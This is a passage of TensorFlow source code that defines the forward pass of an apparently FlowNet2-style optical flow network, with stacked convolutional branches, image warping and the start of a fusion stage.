blobs['conv6'] = tf.nn.conv2d(blobs['conv6'], self.weights['conv6_w'], strides=[1,2,2,1], padding="VALID") + self.weights['conv6_b']
blobs['conv6'] = self.leaky_relu(blobs['conv6'], 0.1)
blobs['conv6_1'] = tf.nn.conv2d(blobs['conv6'], self.weights['conv6_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['conv6_1_b']
blobs['conv6_1'] = self.leaky_relu(blobs['conv6_1'], 0.1)
blobs['predict_flow6'] = tf.nn.conv2d(blobs['conv6_1'], self.weights['Convolution1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['Convolution1_b']
blobs['deconv5'] = tf.nn.conv2d_transpose(blobs['conv6_1'], self.weights['deconv5_w'], output_shape=[batch_size, ADAPTED_HEIGHT/32, ADAPTED_WIDTH/32, 512], strides=[1,2,2,1]) + self.weights['deconv5_b']
blobs['deconv5'] = self.leaky_relu(blobs['deconv5'], 0.1)
blobs['upsampled_flow6_to_5'] = tf.nn.conv2d_transpose(blobs['predict_flow6'], self.weights['upsample_flow6to5_w'], output_shape=[batch_size, ADAPTED_HEIGHT/32, ADAPTED_WIDTH/32, 2], strides=[1,2,2,1]) + self.weights['upsample_flow6to5_b']
blobs['concat5'] = tf.concat([blobs['conv5_1'], blobs['deconv5'], blobs['upsampled_flow6_to_5']], axis=3)
blobs['predict_flow5'] = tf.pad(blobs['concat5'], [[0,0], [1,1], [1,1], [0,0]])
blobs['predict_flow5'] = tf.nn.conv2d(blobs['predict_flow5'], self.weights['Convolution2_w'], strides=[1,1,1,1], padding="VALID") + self.weights['Convolution2_b']
blobs['deconv4'] = tf.nn.conv2d_transpose(blobs['concat5'], self.weights['deconv4_w'], output_shape=[batch_size, ADAPTED_HEIGHT/16, ADAPTED_WIDTH/16, 256], strides=[1,2,2,1]) + self.weights['deconv4_b']
blobs['deconv4'] = self.leaky_relu(blobs['deconv4'], 0.1)
blobs['upsampled_flow5_to_4'] = tf.nn.conv2d_transpose(blobs['predict_flow5'], self.weights['upsample_flow5to4_w'], output_shape=[batch_size, ADAPTED_HEIGHT/16, ADAPTED_WIDTH/16, 2], strides=[1,2,2,1]) + self.weights['upsample_flow5to4_b']
blobs['concat4'] = tf.concat([blobs['conv4_1'], blobs['deconv4'], blobs['upsampled_flow5_to_4']], axis=3)
blobs['predict_flow4'] = tf.nn.conv2d(blobs['concat4'], self.weights['Convolution3_w'], strides=[1,1,1,1], padding="SAME") + self.weights['Convolution3_b']
blobs['deconv3'] = tf.nn.conv2d_transpose(blobs['concat4'], self.weights['deconv3_w'], output_shape=[batch_size, ADAPTED_HEIGHT/8, ADAPTED_WIDTH/8, 128], strides=[1,2,2,1]) + self.weights['deconv3_b']
blobs['deconv3'] = self.leaky_relu(blobs['deconv3'], 0.1)
blobs['upsampled_flow4_to_3'] = tf.nn.conv2d_transpose(blobs['predict_flow4'], self.weights['upsample_flow4to3_w'], output_shape=[batch_size, ADAPTED_HEIGHT/8, ADAPTED_WIDTH/8, 2], strides=[1,2,2,1]) + self.weights['upsample_flow4to3_b']
blobs['concat3'] = tf.concat([blobs['conv3_1'], blobs['deconv3'], blobs['upsampled_flow4_to_3']], axis=3)
blobs['predict_flow3'] = tf.nn.conv2d(blobs['concat3'], self.weights['Convolution4_w'], strides=[1,1,1,1], padding="SAME") + self.weights['Convolution4_b']
blobs['deconv2'] = tf.nn.conv2d_transpose(blobs['concat3'], self.weights['deconv2_w'], output_shape=[batch_size, ADAPTED_HEIGHT/4, ADAPTED_WIDTH/4, 64], strides=[1,2,2,1]) + self.weights['deconv2_b']
blobs['deconv2'] = self.leaky_relu(blobs['deconv2'], 0.1)
blobs['upsampled_flow3_to_2'] = tf.nn.conv2d_transpose(blobs['predict_flow3'], self.weights['upsample_flow3to2_w'], output_shape=[batch_size, ADAPTED_HEIGHT/4, ADAPTED_WIDTH/4, 2], strides=[1,2,2,1]) + self.weights['upsample_flow3to2_b']
blobs['concat2'] = tf.concat([blobs['conv2a'], blobs['deconv2'], blobs['upsampled_flow3_to_2']], axis=3)
blobs['predict_flow2'] = tf.nn.conv2d(blobs['concat2'], self.weights['Convolution5_w'], strides=[1,1,1,1], padding="SAME") + self.weights['Convolution5_b']
blobs['blob41'] = blobs['predict_flow2'] * 20.
blobs['blob42'] = tf.image.resize_bilinear(blobs['blob41'], size=[ADAPTED_HEIGHT, ADAPTED_WIDTH], align_corners=True)
blobs['blob43'] = self.warp(blobs['img1_nomean_resize'], blobs['blob42'])
blobs['blob44'] = blobs['img0_nomean_resize'] - blobs['blob43']
#blobs['blob45'] = tf.sqrt(1e-8+tf.reduce_sum(blobs['blob44']**2, axis=3, keep_dims=True))
blobs['blob45'] = self.l2_norm(blobs['blob44'])
blobs['blob46'] = 0.05*blobs['blob42']
blobs['blob47'] = tf.concat([blobs['img0_nomean_resize'], blobs['img1_nomean_resize'], blobs['blob43'], blobs['blob46'], blobs['blob45']], axis=3)
####################################################################################
####################################################################################
####################################################################################
###################### END OF THE FIRST BRANCH #####################################
####################################################################################
####################################################################################
####################################################################################
blobs['blob48'] = tf.pad(blobs['blob47'], [[0,0], [3,3], [3,3], [0,0]])
blobs['blob48'] = tf.nn.conv2d(blobs['blob48'], self.weights['net2_conv1_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net2_conv1_b']
blobs['blob48'] = self.leaky_relu(blobs['blob48'], 0.1)
blobs['blob49'] = tf.pad(blobs['blob48'], [[0,0], [2,2], [2, 2], [0,0]])
blobs['blob49'] = tf.nn.conv2d(blobs['blob49'], self.weights['net2_conv2_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net2_conv2_b']
blobs['blob49'] = self.leaky_relu(blobs['blob49'], 0.1)
blobs['blob50'] = tf.pad(blobs['blob49'], [[0,0], [2,2], [2,2], [0,0]])
blobs['blob50'] = tf.nn.conv2d(blobs['blob50'], self.weights['net2_conv3_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net2_conv3_b']
blobs['blob50'] = self.leaky_relu(blobs['blob50'], 0.1)
blobs['blob51'] = tf.nn.conv2d(blobs['blob50'], self.weights['net2_conv3_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net2_conv3_1_b']
blobs['blob51'] = self.leaky_relu(blobs['blob51'], 0.1)
blobs['blob52'] = tf.pad(blobs['blob51'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob52'] = tf.nn.conv2d(blobs['blob52'], self.weights['net2_conv4_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net2_conv4_b']
blobs['blob52'] = self.leaky_relu(blobs['blob52'], 0.1)
blobs['blob53'] = tf.nn.conv2d(blobs['blob52'], self.weights['net2_conv4_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net2_conv4_1_b']
blobs['blob53'] = self.leaky_relu(blobs['blob53'], 0.1)
blobs['blob54'] = tf.pad(blobs['blob53'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob54'] = tf.nn.conv2d(blobs['blob54'], self.weights['net2_conv5_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net2_conv5_b']
blobs['blob54'] = self.leaky_relu(blobs['blob54'], 0.1)
blobs['blob55'] = tf.nn.conv2d(blobs['blob54'], self.weights['net2_conv5_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net2_conv5_1_b']
blobs['blob55'] = self.leaky_relu(blobs['blob55'], 0.1)
blobs['blob56'] = tf.pad(blobs['blob55'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob56'] = tf.nn.conv2d(blobs['blob56'], self.weights['net2_conv6_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net2_conv6_b']
blobs['blob56'] = self.leaky_relu(blobs['blob56'], 0.1)
blobs['blob57'] = tf.nn.conv2d(blobs['blob56'], self.weights['net2_conv6_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net2_conv6_1_b']
blobs['blob57'] = self.leaky_relu(blobs['blob57'], 0.1)
blobs['blob58'] = tf.nn.conv2d(blobs['blob57'], self.weights['net2_predict_conv6_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net2_predict_conv6_b']
blobs['blob59'] = tf.nn.conv2d_transpose(blobs['blob57'], self.weights['net2_deconv5_w'], output_shape=[batch_size, ADAPTED_HEIGHT/32, ADAPTED_WIDTH/32, 512], strides=[1,2,2,1]) + self.weights['net2_deconv5_b']
blobs['blob59'] = self.leaky_relu(blobs['blob59'], 0.1)
blobs['blob60'] = tf.nn.conv2d_transpose(blobs['predict_flow6'], self.weights['net2_net2_upsample_flow6to5_w'], output_shape=[batch_size, ADAPTED_HEIGHT/32, ADAPTED_WIDTH/32, 2], strides=[1,2,2,1]) + self.weights['net2_net2_upsample_flow6to5_b']
blobs['blob61'] = tf.concat([blobs['blob55'], blobs['blob59'], blobs['blob60']], axis=3)
blobs['blob62'] = tf.nn.conv2d(blobs['blob61'], self.weights['net2_predict_conv5_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net2_predict_conv5_b']
blobs['blob63'] = tf.nn.conv2d_transpose(blobs['blob61'], self.weights['net2_deconv4_w'], output_shape=[batch_size, ADAPTED_HEIGHT/16, ADAPTED_WIDTH/16, 256], strides=[1,2,2,1]) + self.weights['net2_deconv4_b']
blobs['blob63'] = self.leaky_relu(blobs['blob63'], 0.1)
blobs['blob64'] = tf.nn.conv2d_transpose(blobs['blob62'], self.weights['net2_net2_upsample_flow5to4_w'], output_shape=[batch_size, ADAPTED_HEIGHT/16, ADAPTED_WIDTH/16, 2], strides=[1,2,2,1]) + self.weights['net2_net2_upsample_flow5to4_b']
blobs['blob65'] = tf.concat([blobs['blob53'], blobs['blob63'], blobs['blob64']], axis=3)
blobs['blob66'] = tf.nn.conv2d(blobs['blob65'], self.weights['net2_predict_conv4_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net2_predict_conv4_b']
blobs['blob67'] = tf.nn.conv2d_transpose(blobs['blob65'], self.weights['net2_deconv3_w'], output_shape=[batch_size, ADAPTED_HEIGHT/8, ADAPTED_WIDTH/8, 128], strides=[1,2,2,1]) + self.weights['net2_deconv3_b']
blobs['blob67'] = self.leaky_relu(blobs['blob67'], 0.1)
blobs['blob68'] = tf.nn.conv2d_transpose(blobs['blob66'], self.weights['net2_net2_upsample_flow4to3_w'], output_shape=[batch_size, ADAPTED_HEIGHT/8, ADAPTED_WIDTH/8, 2], strides=[1,2,2,1]) + self.weights['net2_net2_upsample_flow4to3_b']
blobs['blob69'] = tf.concat([blobs['blob51'], blobs['blob67'], blobs['blob68']], axis=3)
blobs['blob70'] = tf.nn.conv2d(blobs['blob69'], self.weights['net2_predict_conv3_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net2_predict_conv3_b']
blobs['blob71'] = tf.nn.conv2d_transpose(blobs['blob69'], self.weights['net2_deconv2_w'], output_shape=[batch_size, ADAPTED_HEIGHT/4, ADAPTED_WIDTH/4, 64], strides=[1,2,2,1]) + self.weights['net2_deconv2_b']
blobs['blob71'] = self.leaky_relu(blobs['blob71'], 0.1)
blobs['blob72'] = tf.nn.conv2d_transpose(blobs['blob70'], self.weights['net2_net2_upsample_flow3to2_w'], output_shape=[batch_size, ADAPTED_HEIGHT/4, ADAPTED_WIDTH/4, 2], strides=[1,2,2,1]) + self.weights['net2_net2_upsample_flow3to2_b']
blobs['blob73'] = tf.concat([blobs['blob49'], blobs['blob71'], blobs['blob72']], axis=3)
blobs['blob74'] = tf.nn.conv2d(blobs['blob73'], self.weights['net2_predict_conv2_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net2_predict_conv2_b']
blobs['blob75'] = blobs['blob74'] * 20.
blobs['blob76'] = tf.image.resize_bilinear(blobs['blob75'], size=[ADAPTED_HEIGHT, ADAPTED_WIDTH], align_corners=True)
blobs['blob77'] = self.warp(blobs['img1_nomean_resize'], blobs['blob76'])
blobs['blob78'] = blobs['img0_nomean_resize'] - blobs['blob77']
#blobs['blob79'] = tf.sqrt(1e-8+tf.reduce_sum(blobs['blob78']**2, axis=3, keep_dims=True))
blobs['blob79'] = self.l2_norm(blobs['blob78'])
blobs['blob80'] = 0.05*blobs['blob76']
blobs['blob81'] = tf.concat([blobs['img0_nomean_resize'], blobs['img1_nomean_resize'], blobs['blob77'], blobs['blob80'], blobs['blob79']], axis=3)
####################################################################################
####################################################################################
####################################################################################
###################### END OF THE SECOND BRANCH ####################################
####################################################################################
####################################################################################
####################################################################################
blobs['blob82'] = tf.pad(blobs['blob81'], [[0,0], [3,3], [3,3], [0,0]])
blobs['blob82'] = tf.nn.conv2d(blobs['blob82'], self.weights['net3_conv1_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net3_conv1_b']
blobs['blob82'] = self.leaky_relu(blobs['blob82'], 0.1)
blobs['blob83'] = tf.pad(blobs['blob82'], [[0,0], [2,2], [2, 2], [0,0]])
blobs['blob83'] = tf.nn.conv2d(blobs['blob83'], self.weights['net3_conv2_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net3_conv2_b']
blobs['blob83'] = self.leaky_relu(blobs['blob83'], 0.1)
blobs['blob84'] = tf.pad(blobs['blob83'], [[0,0], [2,2], [2,2], [0,0]])
blobs['blob84'] = tf.nn.conv2d(blobs['blob84'], self.weights['net3_conv3_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net3_conv3_b']
blobs['blob84'] = self.leaky_relu(blobs['blob84'], 0.1)
blobs['blob85'] = tf.nn.conv2d(blobs['blob84'], self.weights['net3_conv3_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net3_conv3_1_b']
blobs['blob85'] = self.leaky_relu(blobs['blob85'], 0.1)
blobs['blob86'] = tf.pad(blobs['blob85'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob86'] = tf.nn.conv2d(blobs['blob86'], self.weights['net3_conv4_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net3_conv4_b']
blobs['blob86'] = self.leaky_relu(blobs['blob86'], 0.1)
blobs['blob87'] = tf.nn.conv2d(blobs['blob86'], self.weights['net3_conv4_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net3_conv4_1_b']
blobs['blob87'] = self.leaky_relu(blobs['blob87'], 0.1)
blobs['blob88'] = tf.pad(blobs['blob87'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob88'] = tf.nn.conv2d(blobs['blob88'], self.weights['net3_conv5_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net3_conv5_b']
blobs['blob88'] = self.leaky_relu(blobs['blob88'], 0.1)
blobs['blob89'] = tf.nn.conv2d(blobs['blob88'], self.weights['net3_conv5_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net3_conv5_1_b']
blobs['blob89'] = self.leaky_relu(blobs['blob89'], 0.1)
blobs['blob90'] = tf.pad(blobs['blob89'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob90'] = tf.nn.conv2d(blobs['blob90'], self.weights['net3_conv6_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net3_conv6_b']
blobs['blob90'] = self.leaky_relu(blobs['blob90'], 0.1)
blobs['blob91'] = tf.nn.conv2d(blobs['blob90'], self.weights['net3_conv6_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net3_conv6_1_b']
blobs['blob91'] = self.leaky_relu(blobs['blob91'], 0.1)
blobs['blob92'] = tf.nn.conv2d(blobs['blob91'], self.weights['net3_predict_conv6_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net3_predict_conv6_b']
blobs['blob93'] = tf.nn.conv2d_transpose(blobs['blob91'], self.weights['net3_deconv5_w'], output_shape=[batch_size, ADAPTED_HEIGHT/32, ADAPTED_WIDTH/32, 512], strides=[1,2,2,1]) + self.weights['net3_deconv5_b']
blobs['blob93'] = self.leaky_relu(blobs['blob93'], 0.1)
blobs['blob94'] = tf.nn.conv2d_transpose(blobs['blob92'], self.weights['net3_net3_upsample_flow6to5_w'], output_shape=[batch_size, ADAPTED_HEIGHT/32, ADAPTED_WIDTH/32, 2], strides=[1,2,2,1]) + self.weights['net3_net3_upsample_flow6to5_b']
blobs['blob95'] = tf.concat([blobs['blob89'], blobs['blob93'], blobs['blob94']], axis=3)
blobs['blob96'] = tf.nn.conv2d(blobs['blob95'], self.weights['net3_predict_conv5_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net3_predict_conv5_b']
blobs['blob97'] = tf.nn.conv2d_transpose(blobs['blob95'], self.weights['net3_deconv4_w'], output_shape=[batch_size, ADAPTED_HEIGHT/16, ADAPTED_WIDTH/16, 256], strides=[1,2,2,1]) + self.weights['net3_deconv4_b']
blobs['blob97'] = self.leaky_relu(blobs['blob97'], 0.1)
blobs['blob98'] = tf.nn.conv2d_transpose(blobs['blob96'], self.weights['net3_net3_upsample_flow5to4_w'], output_shape=[batch_size, ADAPTED_HEIGHT/16, ADAPTED_WIDTH/16, 2], strides=[1,2,2,1]) + self.weights['net3_net3_upsample_flow5to4_b']
blobs['blob99'] = tf.concat([blobs['blob87'], blobs['blob97'], blobs['blob98']], axis=3)
blobs['blob100'] = tf.nn.conv2d(blobs['blob99'], self.weights['net3_predict_conv4_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net3_predict_conv4_b']
blobs['blob101'] = tf.nn.conv2d_transpose(blobs['blob99'], self.weights['net3_deconv3_w'], output_shape=[batch_size, ADAPTED_HEIGHT/8, ADAPTED_WIDTH/8, 128], strides=[1,2,2,1]) + self.weights['net3_deconv3_b']
blobs['blob101'] = self.leaky_relu(blobs['blob101'], 0.1)
blobs['blob102'] = tf.nn.conv2d_transpose(blobs['blob100'], self.weights['net3_net3_upsample_flow4to3_w'], output_shape=[batch_size, ADAPTED_HEIGHT/8, ADAPTED_WIDTH/8, 2], strides=[1,2,2,1]) + self.weights['net3_net3_upsample_flow4to3_b']
blobs['blob103'] = tf.concat([blobs['blob85'], blobs['blob101'], blobs['blob102']], axis=3)
blobs['blob104'] = tf.nn.conv2d(blobs['blob103'], self.weights['net3_predict_conv3_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net3_predict_conv3_b']
blobs['blob105'] = tf.nn.conv2d_transpose(blobs['blob103'], self.weights['net3_deconv2_w'], output_shape=[batch_size, ADAPTED_HEIGHT/4, ADAPTED_WIDTH/4, 64], strides=[1,2,2,1]) + self.weights['net3_deconv2_b']
blobs['blob105'] = self.leaky_relu(blobs['blob105'], 0.1)
blobs['blob106'] = tf.nn.conv2d_transpose(blobs['blob104'], self.weights['net3_net3_upsample_flow3to2_w'], output_shape=[batch_size, ADAPTED_HEIGHT/4, ADAPTED_WIDTH/4, 2], strides=[1,2,2,1]) + self.weights['net3_net3_upsample_flow3to2_b']
blobs['blob107'] = tf.concat([blobs['blob83'], blobs['blob105'], blobs['blob106']], axis=3)
blobs['blob108'] = tf.nn.conv2d(blobs['blob107'], self.weights['net3_predict_conv2_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net3_predict_conv2_b']
blobs['blob109'] = blobs['blob108'] * 20.
####################################################################################
####################################################################################
####################################################################################
###################### END OF THE THIRD BRANCH ####################################
####################################################################################
####################################################################################
####################################################################################
blobs['blob110'] = tf.concat([blobs['img0_nomean_resize'], blobs['img1_nomean_resize']], axis=3)
#self.run_after(blobs['blob110'], blobs['blob109'])
blobs['blob111'] = tf.nn.conv2d(blobs['blob110'], self.weights['netsd_conv0_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_conv0_b']
blobs['blob111'] = self.leaky_relu(blobs['blob111'], 0.1)
blobs['blob112'] = tf.pad(blobs['blob111'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob112'] = tf.nn.conv2d(blobs['blob112'], self.weights['netsd_conv1_w'], strides=[1,2,2,1], padding="VALID") + self.weights['netsd_conv1_b']
blobs['blob112'] = self.leaky_relu(blobs['blob112'], 0.1)
blobs['blob113'] = tf.nn.conv2d(blobs['blob112'], self.weights['netsd_conv1_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_conv1_1_b']
blobs['blob113'] = self.leaky_relu(blobs['blob113'], 0.1)
blobs['blob114'] = tf.pad(blobs['blob113'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob114'] = tf.nn.conv2d(blobs['blob114'], self.weights['netsd_conv2_w'], strides=[1,2,2,1], padding="VALID") + self.weights['netsd_conv2_b']
blobs['blob114'] = self.leaky_relu(blobs['blob114'], 0.1)
blobs['blob115'] = tf.nn.conv2d(blobs['blob114'], self.weights['netsd_conv2_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_conv2_1_b']
blobs['blob115'] = self.leaky_relu(blobs['blob115'], 0.1)
blobs['blob116'] = tf.pad(blobs['blob115'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob116'] = tf.nn.conv2d(blobs['blob116'], self.weights['netsd_conv3_w'], strides=[1,2,2,1], padding="VALID") + self.weights['netsd_conv3_b']
blobs['blob116'] = self.leaky_relu(blobs['blob116'], 0.1)
blobs['blob117'] = tf.nn.conv2d(blobs['blob116'], self.weights['netsd_conv3_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_conv3_1_b']
blobs['blob117'] = self.leaky_relu(blobs['blob117'], 0.1)
blobs['blob118'] = tf.pad(blobs['blob117'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob118'] = tf.nn.conv2d(blobs['blob118'], self.weights['netsd_conv4_w'], strides=[1,2,2,1], padding="VALID") + self.weights['netsd_conv4_b']
blobs['blob118'] = self.leaky_relu(blobs['blob118'], 0.1)
blobs['blob119'] = tf.nn.conv2d(blobs['blob118'], self.weights['netsd_conv4_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_conv4_1_b']
blobs['blob119'] = self.leaky_relu(blobs['blob119'], 0.1)
blobs['blob120'] = tf.pad(blobs['blob119'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob120'] = tf.nn.conv2d(blobs['blob120'], self.weights['netsd_conv5_w'], strides=[1,2,2,1], padding="VALID") + self.weights['netsd_conv5_b']
blobs['blob120'] = self.leaky_relu(blobs['blob120'], 0.1)
blobs['blob121'] = tf.nn.conv2d(blobs['blob120'], self.weights['netsd_conv5_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_conv5_1_b']
blobs['blob121'] = self.leaky_relu(blobs['blob121'], 0.1)
blobs['blob122'] = tf.pad(blobs['blob121'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob122'] = tf.nn.conv2d(blobs['blob122'], self.weights['netsd_conv6_w'], strides=[1,2,2,1], padding="VALID") + self.weights['netsd_conv6_b']
blobs['blob122'] = self.leaky_relu(blobs['blob122'], 0.1)
blobs['blob123'] = tf.nn.conv2d(blobs['blob122'], self.weights['netsd_conv6_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_conv6_1_b']
blobs['blob123'] = self.leaky_relu(blobs['blob123'], 0.1)
blobs['blob124'] = tf.nn.conv2d(blobs['blob123'], self.weights['netsd_Convolution1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_Convolution1_b']
blobs['blob125'] = tf.nn.conv2d_transpose(blobs['blob123'], self.weights['netsd_deconv5_w'], output_shape=[batch_size, ADAPTED_HEIGHT/32, ADAPTED_WIDTH/32, 512], strides=[1,2,2,1]) + self.weights['netsd_deconv5_b']
blobs['blob125'] = self.leaky_relu(blobs['blob125'], 0.1)
blobs['blob126'] = tf.nn.conv2d_transpose(blobs['blob124'], self.weights['netsd_upsample_flow6to5_w'], output_shape=[batch_size, ADAPTED_HEIGHT/32, ADAPTED_WIDTH/32, 2], strides=[1,2,2,1]) + self.weights['netsd_upsample_flow6to5_b']
blobs['blob127'] = tf.concat([blobs['blob121'], blobs['blob125'], blobs['blob126']], axis=3)
blobs['blob128'] = tf.nn.conv2d(blobs['blob127'], self.weights['netsd_interconv5_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_interconv5_b']
blobs['blob129'] = tf.nn.conv2d(blobs['blob128'], self.weights['netsd_Convolution2_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_Convolution2_b']
blobs['blob130'] = tf.nn.conv2d_transpose(blobs['blob127'], self.weights['netsd_deconv4_w'], output_shape=[batch_size, ADAPTED_HEIGHT/16, ADAPTED_WIDTH/16, 256], strides=[1,2,2,1]) + self.weights['netsd_deconv4_b']
blobs['blob130'] = self.leaky_relu(blobs['blob130'], 0.1)
blobs['blob131'] = tf.nn.conv2d_transpose(blobs['blob129'], self.weights['netsd_upsample_flow5to4_w'], output_shape=[batch_size, ADAPTED_HEIGHT/16, ADAPTED_WIDTH/16, 2], strides=[1,2,2,1]) + self.weights['netsd_upsample_flow5to4_b']
blobs['blob132'] = tf.concat([blobs['blob119'], blobs['blob130'], blobs['blob131']], axis=3)
blobs['blob133'] = tf.nn.conv2d(blobs['blob132'], self.weights['netsd_interconv4_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_interconv4_b']
blobs['blob134'] = tf.nn.conv2d(blobs['blob133'], self.weights['netsd_Convolution3_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_Convolution3_b']
blobs['blob135'] = tf.nn.conv2d_transpose(blobs['blob132'], self.weights['netsd_deconv3_w'], output_shape=[batch_size, ADAPTED_HEIGHT/8, ADAPTED_WIDTH/8, 128], strides=[1,2,2,1]) + self.weights['netsd_deconv3_b']
blobs['blob135'] = self.leaky_relu(blobs['blob135'], 0.1)
blobs['blob136'] = tf.nn.conv2d_transpose(blobs['blob134'], self.weights['netsd_upsample_flow4to3_w'], output_shape=[batch_size, ADAPTED_HEIGHT/8, ADAPTED_WIDTH/8, 2], strides=[1,2,2,1]) + self.weights['netsd_upsample_flow4to3_b']
blobs['blob137'] = tf.concat([blobs['blob117'], blobs['blob135'], blobs['blob136']], axis=3)
blobs['blob138'] = tf.nn.conv2d(blobs['blob137'], self.weights['netsd_interconv3_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_interconv3_b']
blobs['blob139'] = tf.nn.conv2d(blobs['blob138'], self.weights['netsd_Convolution4_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_Convolution4_b']
blobs['blob140'] = tf.nn.conv2d_transpose(blobs['blob137'], self.weights['netsd_deconv2_w'], output_shape=[batch_size, ADAPTED_HEIGHT/4, ADAPTED_WIDTH/4, 64], strides=[1,2,2,1]) + self.weights['netsd_deconv2_b']
blobs['blob140'] = self.leaky_relu(blobs['blob140'], 0.1)
blobs['blob141'] = tf.nn.conv2d_transpose(blobs['blob139'], self.weights['netsd_upsample_flow3to2_w'], output_shape=[batch_size, ADAPTED_HEIGHT/4, ADAPTED_WIDTH/4, 2], strides=[1,2,2,1]) + self.weights['netsd_upsample_flow3to2_b']
blobs['blob142'] = tf.concat([blobs['blob115'], blobs['blob140'], blobs['blob141']], axis=3)
blobs['blob143'] = tf.nn.conv2d(blobs['blob142'], self.weights['netsd_interconv2_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_interconv2_b']
blobs['blob144'] = tf.nn.conv2d(blobs['blob143'], self.weights['netsd_Convolution5_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_Convolution5_b']
blobs['blob145'] = 0.05*blobs['blob144']
blobs['blob146'] = tf.image.resize_nearest_neighbor(blobs['blob145'], size=[ADAPTED_HEIGHT, ADAPTED_WIDTH], align_corners=False)
blobs['blob147'] = tf.image.resize_nearest_neighbor(blobs['blob109'], size=[ADAPTED_HEIGHT, ADAPTED_WIDTH], align_corners=False)
#blobs['blob148'] = tf.sqrt(1e-8+tf.reduce_sum(blobs['blob146']**2, axis=3, keep_dims=True))
blobs['blob148'] = self.l2_norm(blobs['blob146'])
#blobs['blob149'] = tf.sqrt(1e-8+tf.reduce_sum(blobs['blob147']**2, axis=3, keep_dims=True))
blobs['blob149'] = self.l2_norm(blobs['blob147'])
blobs['blob150'] = self.warp(blobs['img1_nomean_resize'], blobs['blob146'])
blobs['blob151'] = blobs['img0_nomean_resize'] - blobs['blob150']
#blobs['blob152'] = tf.sqrt(1e-8+tf.reduce_sum(blobs['blob151']**2, axis=3, keep_dims=True))
blobs['blob152'] = self.l2_norm(blobs['blob151'])
blobs['blob153'] = self.warp(blobs['img1_nomean_resize'], blobs['blob147'])
blobs['blob154'] = blobs['img0_nomean_resize'] - blobs['blob153']
#blobs['blob155'] = tf.sqrt(1e-8+tf.reduce_sum(blobs['blob154']**2, axis=3, keep_dims=True))
blobs['blob155'] = self.l2_norm(blobs['blob154'])
blobs['blob156'] = tf.concat([blobs['img0_nomean_resize'], blobs['blob146'], blobs['blob147'], blobs['blob148'], blobs['blob149'], blobs['blob152'], blobs['blob155']], axis=3)
blobs['blob157'] = tf.nn.conv2d(blobs['blob156'], self.weights['fuse_conv0_w'], strides=[1,1,1,1], padding="SAME") + self.weights['fuse_conv0_b']
blobs['blob157'] = self.leaky_relu(blobs['blob157'], 0.1)
blobs['blob158'] = tf.pad(blobs['blob157'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob158'] = tf.nn.conv2d(blobs['blob158'], self.weights['fuse_conv1_w'], strides=[1,2,2,1], padding="VALID") + self.weights['fuse_conv1_b']
blobs['blob158'] = self.leaky_relu(blobs['blob158'], 0.1)
blobs['blob159'] = tf.nn.conv2d(blobs['blob158'], self.weights['fuse_conv1_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['fuse_conv1_1_b']
blobs['blob159'] = self.leaky_relu(blobs['blob159'], 0.1)
blobs['blob160'] = tf.pad(blobs['blob159'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob160'] = tf.nn.conv2d(blobs['blob160'], self.weights['fuse_conv2_w'], strides=[1,2,2,1], padding="VALID") + self.weights['fuse_conv2_b']
blobs['blob160'] = self.leaky_relu(blobs['blob160'], 0.1)
